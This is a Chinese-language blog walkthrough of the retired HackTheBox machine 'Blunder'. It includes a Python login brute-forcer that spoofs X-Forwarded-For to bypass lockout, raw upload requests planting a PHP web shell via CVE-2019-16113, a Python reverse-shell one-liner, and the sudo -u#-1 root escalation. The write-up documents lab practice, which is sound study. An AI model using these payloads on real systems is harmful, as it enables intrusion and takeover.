文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox-Retired

HackTheBox-Active

VulnHub

代码审计

PHP代码审计

大数据安全

机器学习

基础学习

Python

Python基础

Python安全

Java

Java基础

Java安全

算法

Leetcode

随笔

经验

技术

 2020-06-01   1.9k

HTB::Blunder Walkthrough

0x01 Info Card

0x02 Tools and tips

  • nmap
  • dirsearch
  • wfuzz
  • cewl
  • CMS password leakage
  • sudo -u#-1

0x03 Pentesting

Initial Enumeration

nmap扫描端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
# Nmap 7.80 scan initiated Sun May 31 19:18:12 2020 as: nmap -sC -sV -Pn -oN nmap.txt blunder.htb
Nmap scan report for blunder.htb (10.10.10.191)
Host is up (0.28s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 31 19:18:52 2020 -- 1 IP address (1 host up) scanned in 40.22 seconds

dirsearch扫描路径:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ sudo dirsearch -u http://blunder.htb -e *
Extensions: 46060.txt | HTTP method: get | Threads: 10 | Wordlist size: 6124
Target: http://blunder.htb

[17:25:56] Starting:
[17:25:59] 200 - 7KB - /%3f/
[17:26:07] 200 - 563B - /.gitignore
[17:26:24] 200 - 7KB - /0
[17:26:41] 200 - 3KB - /about
[17:26:49] 301 - 0B - /admin -> http://10.10.10.191/admin/
[17:26:53] 200 - 2KB - /admin/.config
[17:26:53] 200 - 2KB - /admin/
...
...
[17:29:40] 200 - 2KB - /admin/web/
[17:29:40] 200 - 2KB - /admin/login.htm
[17:31:22] 301 - 0B - /domcfg.nsf/?open -> http://10.10.10.191/domcfg.nsf
[17:32:02] 200 - 30B - /install.php
[17:32:14] 200 - 1KB - /LICENSE
[17:33:29] 200 - 3KB - /README.md
[17:33:33] 200 - 22B - /robots.txt

admin需要登录名和密码,.gitignorerobots.txt没有可利用的信息,现在应该是要寻找后台的登陆凭证。

wfuzz扫描web目录下有没有什么敏感文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://blunder.htb/FUZZ.txt" -t 100
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************

Target: http://blunder.htb/FUZZ.txt
Total requests: 4652

===================================================================
ID Response Lines Word Chars Payload
===================================================================

000003513: 200 1 L 4 W 22 Ch "robots"
000004119: 200 4 L 23 W 118 Ch "todo"

Total time: 44.66474
Processed Requests: 4652
Filtered Requests: 4650
Requests/sec.: 104.1537

todo.txt

1
2
3
4
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

盲猜一手fergus应该登录名username,再去寻找password。找了大半天没什么进展,按照HTB的尿性,应该要用主页上的信息生成自定义的字典。

1
2
3
4
$ cewl -w wordlists.txt -d 10 -m 1 http://blunder.htb/

$ wc wordlist.txt
354 354 2459 wordlist.txt

用burp和wfuzz工具都没能Brute Force出来,只能写Python脚本爆破了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/bin/env python3
import re
import requests

def open_resources(file_path):
return [item.replace("\n", "") for item in open(file_path).readlines()]

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_resources('/home/Hackthebox/Blunder/wordlist.txt')

for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

print('[*] Trying: {p}'.format(p = password))

headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}

data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}

login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u = username, p = password))
print()
break

跑出来的结果:

1
2
3
4
5
[*] Trying: character
[*] Trying: RolandDeschain
()
SUCCESS: Password found!
Use fergus:RolandDeschain to login.

fergus:RolandDeschain 登录后台管理系统:

发现这个使用开源的Bludit CMS搭建的,Google一下看有没有公开的CVE:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16113

顺着References中的Github链接还找到作者发现CVE的过程,而且还是中国人,@christa。(这次终于不用看英文的利用过程了😄)

https://christa.top/details/46/

首先上传.htaccess文件,用burp改包绕过前端的后缀名验证:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
POST /admin/ajax/upload-images HTTP/1.1
Host: blunder.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://blunder.htb/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5424398841862763197378512212
Content-Length: 531
Connection: close
Cookie: BLUDITREMEMBERUSERNAME=fergus; BLUDITREMEMBERTOKEN=d08d8cfe8c70b89c242b0a33531998d7; BLUDIT-KEY=dpodie00jad4a6akmo5hookqd2

-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="images[]"; filename=".htaccess"
Content-Type: image/jpeg

RewriteEngine Off
-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="uuid"

0fad6e18e5d590f2af2b005ac4f7f80f
-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="tokenCSRF"

7ca474f9c654ff0e46761ac0e435423a5a8c012a
-----------------------------5424398841862763197378512212--

再上传shell文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
POST /admin/ajax/upload-images HTTP/1.1
Host: blunder.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://blunder.htb/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5424398841862763197378512212
Content-Length: 540
Connection: close
Cookie: BLUDITREMEMBERUSERNAME=fergus; BLUDITREMEMBERTOKEN=d08d8cfe8c70b89c242b0a33531998d7; BLUDIT-KEY=dpodie00jad4a6akmo5hookqd2

-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="images[]"; filename="shell.php"
Content-Type: image/jpeg

GIF89a
<?php system($_GET['cmd']); ?>
-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="uuid"

0fad6e18e5d590f2af2b005ac4f7f80f
-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="tokenCSRF"

7ca474f9c654ff0e46761ac0e435423a5a8c012a
-----------------------------5424398841862763197378512212--

本地监听端口,浏览器访问shell文件,cmd参数如下:

1
http://blunder.htb/bl-content/tmp/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

本机得到reverse shell:

1
2
3
4
5
6
7
8
9
# kali @ kali in ~/HackTheBox/Blunder [17:25:45] 
$ nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.191] 59878
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
[email protected]:/var/www/bludit-3.9.2/bl-content/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Getting User Access

接下来的工作就是要找提权的用户名和密码了,这种简单难度的靶机一般会在某些文件中泄露这些信息~

经过一番查找,发现在/var/www目录下还有另外一个新版本的Bludit CMS,其中有一个文件是在/var/www/bludit-3.10.0a/bl-content/databases下面,文件名是users.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}

很明显有一个password,看样子应该是经过了一次hash,用hash-identifier查看加密方式:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

Least Possible Hashs:
[+] Tiger-160
[+] Haval-160
[+] RipeMD-160
[+] SHA-1(HMAC)
[+] Tiger-160(HMAC)
[+] RipeMD-160(HMAC)
[+] Haval-160(HMAC)
[+] SHA-1(MaNGOS)
[+] SHA-1(MaNGOS2)
[+] sha1($pass.$salt)
[+] sha1($salt.$pass)
[+] sha1($salt.md5($pass))
[+] sha1($salt.md5($pass).$salt)
[+] sha1($salt.sha1($pass))
[+] sha1($salt.sha1($salt.sha1($pass)))
[+] sha1($username.$pass)
[+] sha1($username.$pass.$salt)
[+] sha1(md5($pass))
[+] sha1(md5($pass).$salt)
[+] sha1(md5(sha1($pass)))
[+] sha1(sha1($pass))
[+] sha1(sha1($pass).$salt)
[+] sha1(sha1($pass).substr($pass,0,3))
[+] sha1(sha1($salt.$pass))
[+] sha1(sha1(sha1($pass)))
[+] sha1(strtolower($username).$pass)
--------------------------------------------------

在线加密工具:https://md5decrypt.net/en/Sha1

输入faca404fd5c0a31cf1897b823c695c85cffeb98d得到明文Password120

su切换用户:

1
2
3
4
5
6
7
8
9
10
11
12
[email protected]:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo
su hugo
Password: Password120

[email protected]:/var/www/bludit-3.10.0a/bl-content/databases$ id
id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
[email protected]:/var/www/bludit-3.10.0a/bl-content/databases$ cd
catcd
[email protected]:~$ user.txt
cat user.txt
947a-----------------------a7bb

Getting Root Access

按照套路:

1
2
3
4
5
6
7
8
9
10
[email protected]:~$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash

Google (ALL, !root) /bin/bash,有下面这种提权方式:

https://www.exploit-db.com/exploits/47502

很简单,一个命令解决:

1
2
3
4
5
6
7
8
9
10
[email protected]:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
[email protected]:/home/hugo# id
id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
[email protected]:/home/hugo# cd
cd
[email protected]:/# cat /root/root.txt
cat /root/root.txt
b4c0------------------------d45f

这个靶机除了找密码的过程,其他还是算蛮简单的~~

0x04 Reference

Topic Url
Bludit CVE http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16113
Bludit CVE https://christa.top/details/46/
Sha1 decryption https://md5decrypt.net/en/Sha1
sudo priv https://www.exploit-db.com/exploits/47502
Copyright © ca01h 2019-2021 | 本站总访问量